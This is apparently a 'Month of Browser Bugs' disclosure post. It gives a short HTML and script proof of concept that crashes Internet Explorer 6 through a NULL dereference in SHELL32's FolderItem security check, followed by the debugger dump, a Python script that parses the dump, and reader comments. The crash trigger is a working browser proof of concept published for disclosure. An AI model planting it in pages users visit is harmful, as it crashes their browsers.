MoBB #15: FolderItem Access
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Accessing the object reference of this control triggers a NULL dereference in the security check :-)
<object id="target" classid="clsid:FEF10FA2-355E-4e06-9381-9B24D7F7CC88">
</object>
var a = document.getElementById('target');
alert(a.object);
Demonstration
eax=0000eb6c ebx=00000000 ecx=00000000
edx=09105b62 esi=0013b1ac edi=03cec120
eip=7cb86ce4 esp=0013aee4 ebp=0013b184
SHELL32!CFolder::_SecurityCheck:
7cb86ce4 83790c00 cmp dword ptr [ecx+0xc],0x0 ds:0023:0000000c=????????
This bug will be added to the OSVDB:
Microsoft IE FolderItem Object NULL Dereference
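The debugger output above can be checked mechanically. The following Python is an added example, not code from the original post: it recomputes the faulting address from the register dump, compares it with the address the debugger printed, and classifies the access. The function name `triage` and the 64 KB NULL-region threshold are assumptions of the example.

```python
import re

# Constructed input: the debugger output quoted in the post, verbatim.
DUMP = """\
eax=0000eb6c ebx=00000000 ecx=00000000
edx=09105b62 esi=0013b1ac edi=03cec120
eip=7cb86ce4 esp=0013aee4 ebp=0013b184
SHELL32!CFolder::_SecurityCheck:
7cb86ce4 83790c00 cmp dword ptr [ecx+0xc],0x0 ds:0023:0000000c=????????
"""

# Assumption: addresses below 64 KB are treated as the never-mapped NULL region.
NULL_REGION_END = 0x10000

REG_RE = re.compile(r"\b(e[a-z]{2})=([0-9a-f]{8})\b")
SYM_RE = re.compile(r"^(\S+!\S+):$", re.M)
# address, opcode bytes, mnemonic, [base+disp] operand, debugger-resolved address, contents
INSN_RE = re.compile(
    r"^([0-9a-f]{8}) [0-9a-f]+ (\w+) .*?\[(e[a-z]{2})\+0x([0-9a-f]+)\]"
    r".*?\b[a-z]s:[0-9a-f]{4}:([0-9a-f]{8})=(\S+)$", re.M)


def triage(dump):
    """Classify the faulting memory access in a 32-bit x86 WinDbg-style dump."""
    regs = {name: int(val, 16) for name, val in REG_RE.findall(dump)}
    insn = INSN_RE.search(dump)
    if insn is None:
        raise ValueError("no [reg+disp] memory operand found in dump")
    addr, mnemonic, base, disp, shown, contents = insn.groups()
    if int(addr, 16) != regs.get("eip"):
        raise ValueError("instruction line is not at eip")
    # Recompute the effective address and check it against the debugger's value.
    effective = (regs[base] + int(disp, 16)) & 0xFFFFFFFF
    if effective != int(shown, 16):
        raise ValueError("computed address disagrees with debugger output")
    sym = SYM_RE.search(dump)
    return {
        "symbol": sym.group(1) if sym else None,
        "mnemonic": mnemonic,
        "base_register": base,
        "base_value": regs[base],
        "effective_address": effective,
        "unreadable": set(contents) == {"?"},
        "null_dereference": regs[base] == 0 and effective < NULL_REGION_END,
    }


if __name__ == "__main__":
    for key, value in triage(DUMP).items():
        print(f"{key}: {value}")
```

For this dump the base register `ecx` is zero, so the compare reads offset 0xc from a NULL pointer inside `CFolder::_SecurityCheck`.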
4 Comments:
can you please stop with the IE "fillers"?
we all know that the IE is kinda... scary?
I am using konqueror (3.5.3)
and I would like to hear more konqueror crashes, in order to make konqueror better =)
Perhaps IE is the only browser coughing up fuzz... Scroll back a little and you'll see that Firefox had a hit.
That said, I do wonder just how much of a fuzz filling the other browsers are taking. A little detail in the testing regime would be nice.
I dunno. I'm digging on these vulnerabilities. It's quite eye opening when you consider the potential for mischief. :)
And that's what this is about anyway. Waking up the companies responsible for fixing these bugs and showing the world what they have known for a while and are still not fixing.
IE 6 is STILL a supported platform and considering the fact that IE7 is only going to be released for Vista, they are going to be supporting this for a long time to come.
fwiw, IE7 will run on XP, as well